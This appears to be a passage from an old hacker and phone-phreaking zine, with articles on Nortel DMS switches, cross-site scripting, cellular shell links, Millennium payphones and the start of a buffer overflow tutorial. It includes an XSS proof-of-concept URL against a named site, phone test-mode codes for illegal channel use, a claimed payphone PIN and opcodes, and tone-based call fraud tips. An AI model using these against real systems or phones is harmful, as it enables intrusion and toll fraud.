- OPPOSE THE USE OF STATE POWER TO CONTROL ACCESS TO THE WORKS OF CRITICS,
- INTELLECTUALS, ARTISTS, OR RELIGIOUS FIGURES.
-
- * THAT STATE SPONSORED CENSORSHIP OF THE INTERNET ERODES PEACEFUL AND CIVILIZED
- COEXISTENCE, AFFECTS THE EXERCISE OF DEMOCRACY, AND ENDANGERS THE SOCIOECONOMIC
- DEVELOPMENT OF NATIONS.
-
- * THAT STATE-SPONSORED CENSORSHIP OF THE INTERNET IS A SERIOUS FORM OF ORGANIZED
- AND SYSTEMATIC VIOLENCE AGAINST CITIZENS, IS INTENDED TO GENERATE CONFUSION AND
- XENOPHOPIA, AND IS A REPREHENSIBLE VIOLATION OF TRUST.
-
- * THAT WE WILL STUDY WAYS AND MEANS OF CIRCUMVENTING STATE SPONSORED CENSORSHIP
- OF THE INTERNET AND WILL IMPLEMENT TECHNOLOGIES TO CHALLENGE INFORMATION RIGHTS
- VIOLATIONS.
-
-
-
- =====================[ Digital Multiplexing System ]=====================
- =====================[ by Janus ]=====================
-
-
-
- This article will attempt to explain the DMS (Digital Multiplexing System).
- Think of this file as more of a compilation of the material I have read, rather
- than something I authored completely from scratch. Special thanks to Control-C
- for most of the information found here.
-
- -DMS
-
- DMS was/is made by Northern Telecom. It was first introduced in 1979. To date,
- DMS has been able to interface with such switches as ESS #1-4, Xbar, TSPS, and
- EAX. The DMS switch itself is physically smaller than a Xbar switch, and usually
- smaller than most AXE switches. This is because the DMS switch is more spread
- out, as opposed to other types of switches which are all located in one switch
- house. The use of remote modules give the CO more space to install a Line
- Concentrating Module (LCM) or Main Distribution Frame (MDF). Many versions of
- DMS exist. DMS versions and systems are as follows:
-
- 1) DMS-10 - a C5 switch which can be used with up to 10,800 lines. Designed for
- rural areas and large businesses. Almost always connected with a larger DMS-100
- or -100/200 switch.
-
- 2) DMS-100 - a C5 local office able to be used with 1,000 to 100,000 lines. Very
- widely used today to handle residential areas' phone lines. A DMS-100 local
- office can also be adapted to Equal Access End Office (EAEO)
-
- 3) DMS-200 - can be used with up to 60,000 trunks. Can also serve a AT (Access
- Tandem) function. The Auxiliary Operator Services System (AOSS) is a part of
- DMS-200 that controls Operater-assisted calls, such as Directory Assistance.
- AOSS is made possible by Traffic Operator Position System (TOPS) and Operator
- Centralization (OC). These 2 functions allow transfer operator services from
- other DMS-200 toll centers.
-
- 4) DMS 100/200 - Uses functions such as the toll and local systems mentioned
- above, but also includes the EAEO/AT combination. Can handle either 100,000
- lines or 60,000 trunks. Used instead of using -100 and -200 seperately.
-
- 5) DMS-250 - Not very widely used. Used in association with specialized common
- carriers that need tandem switching.
-
- 6) DMS-300 - Designed for international use. The number of DMS-300 switches that
- are used is in the single digits.
-
- 7) Remote Switching Center (RSC) - Used instead of DMS-100, it has the ability
- to switch up to 5,760 lines.
-
- 8) Remote Line Concentrating Module (RLCM) - Able to switch up to 640 lines. Can
- be used with RSC or DMS-100 with assistance from the Line Concentrator Module
- (LCM).
-
- 9) Outside Plant Module (OPM) - Able to switch up to 640 lines. Can also be used
- in association with RSC or DMS-100.
-
- 10) Subscriber Carrier Module (SCM or SCM-100) -
-
- -a) Subscriber Carrier Module (Rural (SCM-100R)) - Eliminates the CO Central
- Control Terminal (CCT) by being integrated with a DMS-100 switch.
-
- -b) Subscriber Carrier Module SLC-96 (SCM-100S) - gives a direct link between
- DMS-100 and SLC-96 loop carriers.
-
- -c) Subscriber Carrier Module Urban (SCM-100U) - Used to interact with DMS-1
- Urban (DMS version specialized for use in urban areas.)
-
- 11) DMS-Mobile Telephone Exhange (DMS-MTX) - A special type of DMS-100 that is
- used with Cellular switching. It can serve up to 50,000 people in up to 50
- cells.
-
- 12) Supernode -a) DMS-Supernode - Revision of the DMS-100 that supports faster
- processing.
-
- -b) DMS-Supernode SE - same as above, except in a reduced physical size, and
- uses the Link Peripheral Processor (LPP).
-
- Important Features of DMS-100:
-
- 1) Automatic Route Selection - automatically detects the best trunk for routing
- toll and LD calls.
-
- 2) Station Message Detail Recording - an enhanced call logging system,keeps
- track of times, dates, duration, etc.
-
- 3) Direct Inward System Access (DISA) - allows maintenance and administration
- from remote terminals.
-
- Operator Features included with DMS-200 and -100/200:
-
- 1) Traffic Operator Position System (TOPS) - gives certain functions to handle
- incoming and outgoing calls.
-
- 2) Operator Centralization (OC) - Lets an operator interface with the switch
- equipment itself. Allows calls to be routed from a remote DMS switch to a host.
-
- DMS is divided into 4 areas that each handle special operations:
-
- 1) Central Control Complex (CCC) - Controls the functions that are used in the
- other 3 areas. The CCC contains 4 units:
-
- -a) Central Processing Unit: Each DMS switch contains 2 CPUs. The CPUs have
- access to memory banks where stored programs and network data are located.
- Consider the CPUs the "engines" of the switch. They process all incoming data
- from outside lines.
-
- -b) Program Store Memory Module: Associated with one CPU to contain the program
- instructions needed to run programs on the switch. The second PS contains
- duplicate instructions.
-
- -c) Data Store Memory Module: Contains information such as customer information
- and office data. The second DS is a duplicate that is used with the second CPU.
-
- -d) Central Message Controller: Controls the messages between the other areas of
- the CCC and the Network Message Controller (NMC) in the various Network Modules
- or the I/O controller. Both CPUs have access to the CMC.
-
- 2) Network (NET) - Network Modules handle the vocal aspect between the
- Peripheral Modules and the Central Control Complex (CCC).
-
- 3) Peripheral Modules (PM) - Interface between analog trunks, subscriber lines,
- and digital carrier spans (DS-1). Responsible for creating dialtones,
- sending/receiving signalling, and checking the network.
-
- Before 1984, the following types of PMs existed:
-
- -a) Trunk Module - Changes speech into digital format to be sent through the
- line. The TM also handles MF tones, test circuit announcement trunks, etc.
-
- -b) Digital Carrier Module - gives a digital interface between the DMS switch
- and the DS-1 digital carrier. The DS-1 signal consists of 24 voice channels.
-
- -c) Line Module - gives an interface for a maximum of 640 analog lines and
- condenses the voice and signaling into two, three, or four DS-30, 32-channel
- speech links.
-
- -d) Remote Line Module - same as above, except it controls the DMS switch
- remotely. Can be used up to 150 miles away.
-
- Since 1984, 10 more types were added:
-
- -a) Digital Trunk Controller - Interfaces up to 20 DS-1 lines, then sends the
- DS-1 lines to the network.
-
- -b) Line Group Controller - Can interface up to 20 DS-30 lines, and can serve
- RSCs, RLCMs, or OPMs.
-
- -c) Line Trunk Controller - has the ability to give interfaces to a maximum of
- 20 outside ports from DS-30A speech links or DS-1 links to 16 network side DS-30
- speech links.
-
- -d) Line Concentrating Module - An expanded version of the LTC, it can serve up
- to 640 subscriber lines interfaced with 2-6 DS-30 speech links.
-
- -e) Remote Switching Center - interfaces subscriber lines at a remote location
- to a DMS-100 host. The RSC consists of the Line Concentrator Module, Remote
- Cluster Controller, Remote Trunking, Remote-off-Remote, and Emergency
- Stand-alone.
-
- -f) Remote Line Concentrating Module - an LCM used from a remote location from
- the DMS-100 host. Can handle up to 640 lines, sometimes used as replacement for
- PBXs.
-
- -g) Outside Plant Module - Outside plant remote unit. Handles 640 lines over 6
- DS-1 Links.
-
- -h) Subscriber Carrier Module - Remote interface for remote concentrators.
-
- -i) SCM-100R - Can interface up to five DMS-1R Terminals. Each terminal can
- handle up to 256 lines.
-
- -j) SCM-100U - Can interface up to three DMS-1 Urban RTs. Each RT can interface
- up to 576 POTS or special service lines.
-
- 4) Maintenance and Adminstration - DMS provides different ways to maintain and
- administrate the network. M&A is divided into 4 major groups:
-
- -a) Administrative: Provides for the interrogation, collection and modification
- of data.
-
- -b) Internal Maintenance: Includes all DMS hardware (to the MDF) and software.
-
- -c) External Maintenance: Includes circuits on the transmission facility.
-
- -d) Reporting: Include I/O facilities and the alarm system.
-
- Common Channel Interoffice Signalling (CCIS) uses a dedicated line to transmit
- data between offices, trunks, or trunk groups. CCIS-6 uses the International
- Consultative Committee on Telephone and Telegraph (CCITT) No. 6 international
- standard. CCIS-7 added the ability to use CCIS with almost all common DMS
- versions such as DMS-100, -200, -100/200, and -100/200 with TOPS. CCIS-6 uses 2
- types of Serving Offices (SO):
-
- 1) CCIS-BS: used for trunk signalling between COs. Transmits data such as
- numbers dialed, number dialed from, and other routing information. CCIS-BS put
- an end to Blue Boxing.
-
- 2) CCIS-DS: enables the use of touch-tone menu administration, such as voice
- mail, calling card input, and so forth.
-
- Access Tandems:
-
- 1) Equal Access (EA) gives a connection between Local Access and Transport Areas
- (LATA). It provides such services as ANI, Automatic Message Accounting (AMA)
- for both originating and terminating calls, and operator service signaling.
-
- 2) Equal Office End Office (EAEO) gives a connection between interLATA carriers
- and international carriers' POP.
-
- 3)Access Tandem with Equal Access End Office gives a connection from a trunk
- tandem to ICs/INCs POP inside a LATA. It uses a two-stage "overlap output
- pulsing" method which makes dialing quicker and easier. The first stage
- identifies the INC dialed and picks a reliable outgoing trunk. A connection is
- established from the INC to the EAEO through the access tandem. The second stage
- processes ANI and makes a connection to the called number through your specific
- DMS switch type.
-
- 4) Access Tandem with a Non-Equal End Office uses Feature Group A, B, or C to
- connect to an IC/INC. It uses standard Central Automatic Message Accounting
- (CAMA) to place a call through an AT.
-
- Other services provided with DMS switches used in urban areas:
-
- 1) Auxiliary Operator Services System (AOSS) - used primarily for directory
- assistance, and the intercept needs not included with TOPS.
-
- 2) Integrated Business Network (IBN) - commercial concept designed for business
- to have a small, private PBX. IBN can be installed into a business to a Centrex
- Control Office or a Centrex Costumer Unit with minor hardware adjustments.
- Features of IBN include the ability to handle 30,000 lines, customer call
- records, centralized attendant maintenance, administration functions, and direct
- inward dialing.
-
- 3) Electronic Switched Network (ESN) - designed to meet needs of multi- location
- complexes. Used with SL-1 or -100 Digital Business Communications Systems with
- networking features or a DMS-100 IBN host.
-
- 4) Specialized Common Carrier Service (SCCS) - provides conversion of analog and
- digital signals. Must be used with older analog lines, sometimes also used with
- newer digital lines.
-
- DMS-MTX is a DMS switch used for switching radio and cellular signals. DMS
- switches provide 3 basic types of cell switching:
-
- 1) Stand-alone switching is used by a MTX which is interfaced with one or more
- C5 EOs with DID trunks. MTX is used with urban areas, MTXC for suburban areas,
- and MTXM for rural areas.
-
- 2) Combined switching is the most cost-effective type of MTX and is easy to
- install. It can be incorporated into a DMS-100 switch and used with cellular
- software.
-
- 3) Remote switching is accomplished by the Remote Switching Center (RSC)
- alongside a Cell Site Controller (CSC). A Remote or Stand-alone switch hosts the
- remote switch. Remote switching is not used in urban areas.
-
- ___________ Suggested Reading: Understanding DMS; Control-C; 1987 (Most of my
- information came from here!) DMS Family of Digital Switching Systems; Erudite;
- ???? DMS-100; Jester Sluggo; ???? DMS-100 Family System; Northern Telecom;
- 1978
-
- --Janus hijanus@tupac.com
-
-
-
- =================[Cross Site Scripting the Security Gap]=================
- =================[ by Tamer Sahin ]=================
-
-
-
- I wonder if Microsoft applies the patches on their systems of their products.
- This question is always on my mind. I personally think that sufficient effort is
- not made on this topic,and with a little amount of investigation about it,i've
- found out that a very simple security threat is still standing at the
- microsoft.com web site.This problem ,of course,does not have a direct harm on
- the server,but may turn out to be annoying if used indirectly.Yes,the name of
- this security gap is ""Cross Site Scripting" .This security gap ,which was
- discovered by Georgi Guninski, looks like it might cause some problems in banks
- and some places where online shopping is done.
-
- Can Be Done About It ? I want to talk a little bit about "Cross Site Scripting".
- This security gap was announced in the preceding months.By means of it ,many
- commands can be run on the user's browsers via the intented sites; with the help
- of some scripts ,some processes such as reading files from their discs, or even
- diverting them to other sites can be held out. These kind of security threats
- are big deal for financial settings or for the institutes which provide shopping
- via net ( In one of the commercials of a bank in Turkey, people sit in a car
- ,lock the doors ,and with a spontaneous fantasy ,show their id cards to the ones
- who have come out to do banking processes ,to verify the reliability of the site
- . However ,there is this problem in a large amount of sites,but what surprised
- me was to find out that you can see this security gap in microsoft ,too ,which
- has delivered a patch for this problem.
-
- Practice Any asp operating on the site (could be a search engine or could as
- well be null.htw kind of script ) can be run making an addition to the <script>
- figure. I am going to tell how it is run with a minimum code, now. It is not
- difficult at all to write more specific scripts , a little amount of imagination
- could be much more annoying then it is thought,as a security gap. Yes,as i have
- mentioned before,it is not that big deal to alter the properties of this script
- ,that's only a minimum instance. Now the hack theories...
-
- Theory? The problem that arised in microsoft ,is the null.htw file which is
- saved on the server.The majority of us (?) delete .htw .idq etc ending scripts
- ,or arrange their permissions so that we permit their usage. It looks like the
- Microsoft didnt feel a necessity such that . Writing an url as below,we can run
- the "Cross Site Scripting" security gap ,with the help of null.htw:
-
- http://www.microsoft.com/null.htw?CiWebHitsFile=/default.asp&CiRestriction=
- "<SCRIPT>alert('Helloo!!');</SCRIPT>"
-
-
-
- The Solution You can find a code below ,which can be used for the "Cross Site
- Scripting" attacks on forms etc.With means of this code ,the transfer of the
- large sized script blocks with the "onsubmit" method will be prevented and
- warning signals will be sent for the figures such as "% < > [ ] { } ; & + - " '
- ( )" not executing them .
-
- <PRE class=CodeForeground>function checkForm() {
- document.forms[0].userName.value = _
- RemoveBad(document.forms[0].userName.value); return true; } // Bad Characters
- function RemoveBad(strTemp) { strTemp =
- strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g, ""); return
- strTemp; } </PRE>
-
-
-
- Offical Patch http://www.microsoft.com/technet/security/bulletin/MS00-060.asp
-
- Tamer Sahin Hacking Officer http://www.tamersahin.net feedback@tamersahin.net
-
-
-
- =============[Shell/PPP Connectivity over Cellular Networks]=============
- =============[ by engel ]=============
-
-
-
-
- This hasn't been fully tested (I've only tested the shell portion). It's up to
- you to try out the PPP connection. In theory, it should work, but it's going to
- be really slow.) And be forewarned, this is illegal. Everything you do based on
- this is your choice, not mine. I am only supplying information, and I am not
- responsible for your actions. If the FCC comes a knocking, don't be bitching to
- me or LoU about your legal engagements. It is your fault if you get caught doing
- any of the below in practice. Not mine.
-
- The idea came to me a few months ago when I was in my friend's car, wishing that
- I could nab a few files off my system when we were on the road. It completely
- dawned on me a few minutes later when I was playing with my Motorola 2800
- bagphone. I had to find a way to make a network connection to my main server
- back at my (old) house. And I figured cellular communication was the way to go.
-
- I went home later that day, and dug around my box full of (mostly) various
- electronics and phone equipment. I found an old US Robotics 28.8 ext. modem,
- RJ-11 -> Motorola TeleTAC adapter (For modems, duh.) and my old acoustic
- coupler. I threw the external modem on my server, then ran some RJ11 to the
- adapter, and connected the adapter to the TeleTAC. Whee.
-
- Now, client side, I popped the coupler onto the 2800, then connected it to my
- amazing 14.4 on the lappy. Now how the fuck did I establish the god damn
- connection? This is going to be a bit lengthy, so let's list it out.
-
- 1) I edited my inittab (/etc/inittab) and added a dialup term. (You can find
- it.)
-
- 2) Popped both cellphones into testmode. Nothing like FCN-00-**-83786633-STO.
- Then I popped them onto an unused channel. And then (gasp) put them into Rx/Tx
- mode by doing the following. a) 08# b) 10# c) 05# d) 353#
-
- Oh my. I think we can hear ourselves talk over the channel. Isn't that special?
-
- 3) On the external modem, I threw a switch on it that said 'Auto Answer'. Now, I
- realize this isn't on all Externals, and I should recommend that you find one,
- wheter it's at a Goodwill, or a vintage computer store.
-
- 4) Started minicom on the laptop. And typed in the magical string, ATD.
-
- Boom. That's all it took. I got an amazing 19.2 connection over the cellular
- link. Now, could you get a higher connection with faster modems? No, dumb ass.
- You can probably get a 28.8 connection, but it will most likely time out.
-
- Now, unless you have some really old towers around your area that actually
- forward channels through different towers (i.e. You're driving down the road,
- and you're out of the original tower's range, then you switch over.) you're
- going to get disconnected if you pass the limited range of your tower, which is
- anywhere between 6 to 10 miles. There is only a couple ways around that, but I'm
- sure you can figure them out within a few hours, minutes, or seconds from now.
-
- Okay, so you have yourself a cellular shell. Whoop dee doo. Now if you can
- actually make a networked connection over the link, that would be nice, eh?
- Well, using the wonderful PPP protocol, we can!
-
- Add a new user on your host, name it whatever the fuck you want. Now, for the
- shell, make sure it's /usr/sbin/pppd. Make a new file in your favorite editor
- called .ppprc and put it in the user's $home. Put the following in it.
-
-
- connect -detach modem crtscts lock :192.168.100.4
-
- Whoop, there it is. Now on the client side, make a ppp script that logs in as
- that user. And that's all she wrote. It should work, but I make no guarantees
- whatsoever, since I never tested it.
-
- So play around with it, if you dare. Mail me some followups, additions, and so
- on also, I'd like to hear some new ideas to add to this simple project. Next
- time, I'll get in depth with more wireless networking projects for your geeky
- enjoyment.
-
- http://www.phonegeek.org
-
-
-
- =====================[ Nortel Millennium Payphones ]=====================
- =====================[ by ^CircuiT^ ]=====================
-
-
-
-
- Well for you people out there that don't know what a millennium pay phone looks
- like, I'll start out by telling you. There are many different types of
- millennium payphones and none of them look the same, so instead of siting here
- and trying to describe them all I have a few pictures with this file. The most
- common Millennium payphone is the M1231 and since it is the most common that is
- the one I will talk about most in this file. For the rest of them look at the
- end of this file. The M1231 is black with a silver front and a two line LED
- screen that can be reprogrammed to say other things, such as "Mr. T was here"
- but ill be getting into the reprogramming of that a bit later. Under the LED
- screen there are four buttons the first two control the volume. The next one
- controls the languages, for example English to Spanish or English to French. For
- you people in Canada and the last button hangs up your in order to make another
- call. At the top of the phone it's blue and at the bottom there is a yellow card
- reader for smart cards, credit cards, and other calling cards such as MCI
- calling cards. Just above the yellow card reader there are five more buttons
- that the owner/local phone company can program to do what ever they want. There
- are two different versions of the M1231 ver1.0 does not have a RJ-11 jack but
- the ver2.0 does. The RJ-11 jack is there so you can plug your laptop into the
- phone and connect to the Internet. (The M1231 ver2.0 is mostly in airports)
-
- Well know that you know what they look like let's get into the security of the
- pay phone. It has four keyholes as you might have seen by just looking at it.
- The two keyholes on the top and left-hand side of the phone are for changing the
- LED screen. There is another keyhole under neather the yellow card reader that
- is for changing the coin box and on the side of the coin box there is yet
- another keyhole, you need both keys to open the coin box. You will also need an
- access code (or pin) to get to the coin box (this is not yet confirmed). Another
- little bit of security the phone has is an alarm some are silent and some are a
- loud beep. When the alarm is set off the phone calls a set number and notifies
- them that there is a problem. There are some security rumors flying around, such
- as there is a tracking device in the phone and that if a phone stolen and then
- hook-up to a new phone line it will automatically call a set number.
-
- Ok, now that you know about the phones security and how to open it, lets get
- into the internal hardware workings of the phone. Unlike other payphones the
- Nortel Millennium payphone has a built in computer and modem the computer is
- called the "Millennium Manager" and it keeps a log of every call made form the
- phone including (800, 888, 877, 911, 611, 411, 311, and 0). It also keep track
- of how the person paid for the call ( collect, card, cash), and also keeps tabs
- on how many coins are in the coin box and if anything else goes wrong in the
- phone such as the card reader or LED screen it calls a set number and tells
- them, and a log of every time the phone is opened or the coin box is opened or
- if someone changes the display screen. A tool called the "Millennium Maximizer"
- accesses all this but not much is yet known about this. So as I get that
- information I will release it. On to the yellow card reader. Once you have
- opened the phone you should be able to remove the yellow card reader with
- stander tools such as a screwdriver...etc. Once you have the yellow card reader
- you should be able to hook it up to your home computer and read cards with it
- but with what software I don't know. Some people say that you can modify cards
- with it as well but I have seen nothing that would indicate that. Ok now that
- all that stuff is out of the way lets talk about that little two line LED sign.
- To change the display this is what you must do first: You will need two keys one
- for the top and the one for the left-hand side. After unlocking them you will
- have to enter an access code (or pin) from the keypad. (If you don't enter the
- pin an alarm will sound.) Then you can remove the top part of the phone in side
- you will find a port that you can plug in a Millennium Maxmizer.
-
- Ok people, we've made this far so let get straight into the software aspect of
- the phone starting off with the Millennium Manager. The Millennium Manager is
- the program the phone's computer runs, it keep track of everything as I said
- above and that's all I know at this point about the manager. Now onto the
- Opcodes. Opcodes are short strings of number that are pre-set functions on
- Millennium payphones but you must correctly enter a pin before you have the
- chance to input an Opcode. I have heard from other people that you can dial
- 2541965 or yet another code that is CRASERV or in numbers 2727378 with the hook
- down. After you dialed it you should be asked for an access code (or pin). One
- known pin is 25563. After you entered the PIN you could enter any Opcode. Here
- are a list of opcodes: 267# Answer detect 274# Display brightness control
- (down?) 277# Display brightness control (up?) 349# Unknown 636# memory access
- 688# Unknown 66666# motor sound prompts to open phone - probably coin removal
- 996# error has occurred. (Please note these codes are what people have told me I
- have not getten them to work.) Some other software aspects of the phone is the
- fake dial tone, its only a recording. You would know this if you ever picked one
- up cause you hear the fake dial tone and some op telling you to "insert your
- card". So what happens is you dial the number your calling put your money in and
- the computer dials it so you never get the chance to hear a real dial tone. You
- might be asking yourself if I don't ever hear a real dial tone can I box a call
- off a millennium phone. The answer is yes and no. Yes you can box local calls, I
- do it all the time just hit 0 for the op and tell her the phone's keypad is
- messed up and ask her to dial for you then drop in your tones. The No is for
- boxing long distances calls, the Op's don't really like it when you put in $3.50
- in fake coins.
-
- One of the most fun things I have found about the millennium phone is that you
- can use it as a DTMF decoder. It's really simple to all you do is take you
- recorded DTMF tone to the phone and play them really loud into the month piece
- of the phone the numbers will show up on the LCD screen and there you go, you
- got a DTMF decoder.
-
- Well we have covered a hole lot about the millennium payphone but theres still a
- little bit to cover like the fact that millennium phones have a ringer but never
- ring. The reason for this is because if you call a millennium phone you will one
- of about four different msg saying things like " this line is for out going
- calls only " or " the number *** - **** is out of serves ". The reason Nortel
- did this was because they didn't want drug dealers hanging out by the phone
- waiting for a call. If you act like a really nice person you can call the op and
- ask her to call you back on it "but wait a min you said they cant get incoming
- calls". Well they can but only from an op see when you call her this pop's up on
- her screen 0 (+) MIL_UNIV or 0 (+) MIL_CARD plus your location so she thinks why
- call them back? But if you convince her who knows you might of made that phone
- ring for the first time ever.
-
- Ok now that we are done with everything lets talk about all the other millennium
- phones. Well since I haven't used any of these phone yet, so I don't have much
- to talk about so I put in here what Nortell has to say about there phone from
- there web page and if your reading this out of the zip you got pictures with
- this file. Enjoy.
-
- The M1000 Public communications access terminals need to be ready for the future
- -- even if they accept only coins today. The Millennium M1000 Coin Basic
- Terminal is an ideal solution for low-revenue sites because it keeps the door
- open to future expansion by allowing you to add options quickly and easily in
- the field. For example, you can install a 2-line x 20-character illuminated
- display that can help you generate new sources of revenue. And to further
- increase payphone usage, you can add the optional card reader. Driven by
- Millennium Manager, this payphone workhorse protects your investment and revenue
- stream with electronic coin validation, anti-fraud capabilities and
- anti-vandalism features.
-
- The M1131 This terminal is the perfect solution for service providers who want
- to offer advanced public communications access while eliminating the cost of
- handling coins. The Millennium M1131 Card Only Terminal handles card
- transactions with ease allowing customers to use a variety of cards, including
- calling cards, credit cards, cash cards and smart cards. Card customization
- programs provide another opportunity to further differentiate yourself from the
- competition by making branding and image advertising possible. And like all
- Millennium terminals, the Card-Only Terminal offers intelligent features such as
- call statistics, self-diagnostics and alarms, store-and-forward routing, voice
- prompts and call rating. Simple to install and maintain, these terminals are
- backed by the powerful, fault-tolerant Millennium Manager.
-
- The M1231 The More payment options mean more customers. From coins to calling
- cards, credit cards, cash cards and smart cards -- the Millennium M1231 MultiPay
- Terminal accepts them all. And with so many options, gaining and retaining
- customer loyalty is as simple as picking up the phone. Millennium MultiPay
- Terminals are changing the scope of customer expectations and the future of
- public payphones. The RJ-11 data jack provides Internet access and enables data
- calls. A scrolling display can double as a billboard for advertising and
- cross-selling promotions. Quick Access Keys speed revenue generation and allow
- customers to access their choices quickly. Busy lobbies, cafeterias, convenience
- stores and parking lots are just a few of the many sites where MultiPay
- Terminals easily reach their earning potential.
-
- The M1241 This advanced terminal can offer consumers more choices, added
- convenience and access to the power of the network. It's the ideal platform,
- allowing smart cards, credit cards and calling cards to drive increased usage
- and revenue. Configured with the RJ-11 integrated data jack, the Millennium
- M1241 MultiPay/MultiApplication Terminal lets you offer easy access to network
- services, e-mail and the Internet to attract callers with laptop computers. Not
- only can you reap additional revenues from the computer calls themselves, the
- terminal's flashing display and Quick Access Keys let you cross-sell your
- products and services to callers during data transactions. Or you can lease
- displays and Quick Access Keys to third-party advertisers for additional
- revenue. The M1241 Terminal also features downloadable code, which allows you to
- make changes and upgrade services without a site visit.
-
- The M1245 This consumer-friendly terminal can provide information to your
- customers with a touch of a button -- while increasing your revenue. With its
- large graphical display, this terminal becomes much more than a payphone to
- attract people on the move. It's an electronic billboard. Ideal for any
- high-traffic site or any retail delivery location, the M1245 MultiApplication
- Terminal is loaded with features -- but uncluttered and easy to use. And it
- accepts coins as well as cards for added convenience and customer appeal. An
- 8-line x 20-character easy-to-read display catches the attention of passersby,
- providing a strong promotional and advertising medium. Soft keys support
- interactive phone-based transactions. And graphical images that change whenever
- the receiver goes on-hook or off-hook entice the customer to interact -- all at
- the touch of a button.
-
- The M1361 Millennium Offers an attractive alternative for nontraditional
- payphone locations, such as a waiting room table, lobby counter or the wall in a
- VIP lounge. With its distinctive style and small footprint, the Millennium Desk
- Set delivers all the features, convenience, reliability and security you find in
- Millennium wall-mounted terminals. And it becomes a mobile office -- or home
- away from home - by providing an advanced card reader along with an RJ-11 data
- jack so callers can plug in a laptop computer. An illuminated display and Quick
- Access Keys tell the customer this is more than just a phone. Caller-controlled
- features such as language selection, volume control and a Next Call button make
- using this terminal a comfortable, hassle-free experience.
-
- The M1400 and M1410 Millennium offers correctional facilities what they need
- most -- flexibility and control of inmate communications. Powerful phone
- monitoring and reporting capabilities provide on-line access to management
- information. That means you can adjust payphone functions - such as curfew
- periods, call duration, and changes to call screening lists or personal
- identification numbers (PINs). And you can make these changes without having to
- call your service provider. The Millennium Inmate System also tackles phone
- fraud and illegal activities head-on with capabilities that provide
- unprecedented control over payphone access and usage. And self-diagnostics built
- into each Millennium Inmate Terminal virtually eliminate out-of-service
- situations.
-
- The Millennium Kiosk Represents a new way for you to reach your customers at all
- times, allowing you to deliver email accessibility, web browsing, online
- services, the printing of items such as tickets or vouchers and more. The
- Kiosk's advanced design offers robust and ergonomic terminals designed for
- public use, with open application delivery platforms that feature
- non-proprietary, standards-based architecture. Plus, they are easy to maintain
- with network-based administration that allows the centralized management and
- updates of terminals. You can use the Kiosk to take advantage of your Internet
- and Call Center applications knowing that customers can use this public
- communications device to access your organization. That can mean more revenue
- for you because your business never closes and can operate 24 hours a day, 7
- days a week!
-
- Here is some information and phone number about Nortel that I think some people
- out there might like. There full Corporate name is Nortel Networks Corporation.
- They have Stock Exchanges on New York, Toronto and London stock exchanges. The
- 1998 Revenues were US $17.6 billion and the 1998 Earnings were US $1.07 billion.
- They Employ Approximately 70,000 people worldwide. The CEO is John Roth
- (President and Chief Executive Officer). The CFO is Frank A. Dunn (Senior Vice
- President and Chief Financial Officer). The CIO is Keith Powell (Chief
- Information Officer). The CMO is John A. (Ian) Craig (Executive Vice President
- and Chief Marketing Officer). The CTO is Bill Hawe (Senior Vice President and
- Chief Technology Officer). The Corporate Headquarters is at 8200 Dixie Road,
- Suite 100 Brampton, Ontario L6T 5P6 Canada 905-863-0000
-
- 1-800-263-7412 Bell Canada Millennium (Help Line) 1-800-567-2448 Bell Canada
- Millennium (Test Line) 1-800-461-1747 Bell Canada Millennium (Voice Test)
- 1-800-461-1879 Bell Canada Millennium (Data Test) 1-800-772-2141 Bell Canada
- Millennium (Setshop) 1-800-668-4862 Bell Canada Millennium (Coin) 1-800-466-7835
- Millennium sales representative 1-214-684-5930 Millennium sales representative
- 1-416-748-2694 Bell Canada, Pay phone Department Well that's all I hope you
- enjoyed the file and you get some good use out of it. I would like to dedicate
- this file to my loving girlfriend without her support I could not of made this
- happen. I would also like to thank all the people who helped me along the way
- with this file you know who you all are. If anyone wants to contact me E-mail me
- at: circuitpimp@hotmail.com
-
- http://www.ppchq.org
-
-
-
- ==================[Writing Buffer Overflow Exploits]=====================
- ==================[ by mixter ]=====================
-
-
-
- Buffer overflows in user input dependent buffers have become one of the biggest
- security hazards on the internet and to modern computing in general. This is
- because such an error can easily be made at programming level, and while
- invisible for the user who does not understand or cannot acquire the source
- code, many of those errors are easy to exploit. This paper makes an attempt to
- teach the novice - average C programmer how an overflow condition can be proven
- to be exploitable.
-
- Mixter
-
- 1. Memory
-
- Note: The way I describe it here, memory for a process is organized on most
- computers, however it depends on the type of processor architecture. This
- example is for x86 and also roughly applies to sparc.
-
- The principle of exploiting a buffer overflow is to overwrite parts of memory
- which aren't supposed to be overwritten by arbitrary input and making the
- process execute this code. To see how and where an overflow takes place, lets
- take a look at how memory is organized. A page is a part of memory that uses its
- own relative addressing, meaning the kernel allocates initial memory for the
- process, which it can then access without having to know where the memory is
- physically located in RAM. The processes memory consists of three sections:
-
- - code segment, data in this segment are assembler instructions that the
- processor executes. The code execution is non-linear, it can skip code, jump,
- and call functions on certain conditions. Therefore, we have a pointer called
- EIP, or instruction pointer. The address where EIP points to always contains the
- code that will be executed next.
-
- - data segment, space for variables and dynamic buffers
-
- - stack segment, which is used to pass data (arguments) to functions and as a
- space for variables of functions. The bottom (start) of the stack usually
- resides at the very end of the virtual memory of a page, and grows down. The
- assembler command PUSHL will add to the top of the stack, and POPL will remove
- one item from the top of the stack and put it in a register. For accessing the
- stack memory directly, there is the stack pointer ESP that points at the top
- (lowest memory address) of the stack.
-
- 2. Functions
-
- A function is a piece of code in the code segment, that is called, performs a
- task, and then returns to the previous thread of execution. Optionally,
- arguments can be passed to a function. In assembler, it usually looks like this
- (very simple example, just to get the idea):
-
- memory address code 0x8054321 <main+x> pushl $0x0 0x8054322 call $0x80543a0
- <function> 0x8054327 ret 0x8054328 leave
- ...
- 0x80543a0 <function> popl %eax 0x80543a1 addl $0x1337,%eax 0x80543a4 ret
-
- What happens here? The main function calls function(0); The variable is 0, main
- pushes it onto the stack, and calls the function. The function gets the variable
- from the stack using popl. After finishing, it returns to 0x8054327. Commonly,
- the main function would always push register EBP on the stack, which the
- function stores, and restores after finishing. This is the frame pointer
- concept, that allows the function to use own offsets for addressing, which is
- mostly uninteresting while dealing with exploits, because the function will not
- return to the original execution thread anyways. :-) We just have to know what
- the stack looks like. At the top, we have the internal buffers and variables of
- the function. After this, there is the saved EBP register (32 bit, which is 4
- bytes), and then the return address, which is again 4 bytes. Further down, there
- are the arguments passed to the function, which are uninteresting to us. In this
- case, our return address is 0x8054327. It is automatically stored on the stack
- when the function is called. This return address can be overwritten, and changed
- to point to any point in memory, if there is an overflow somewhere in the code.
-
- 3. Example of an exploitable program
-
- Lets assume that we exploit a function like this:
-
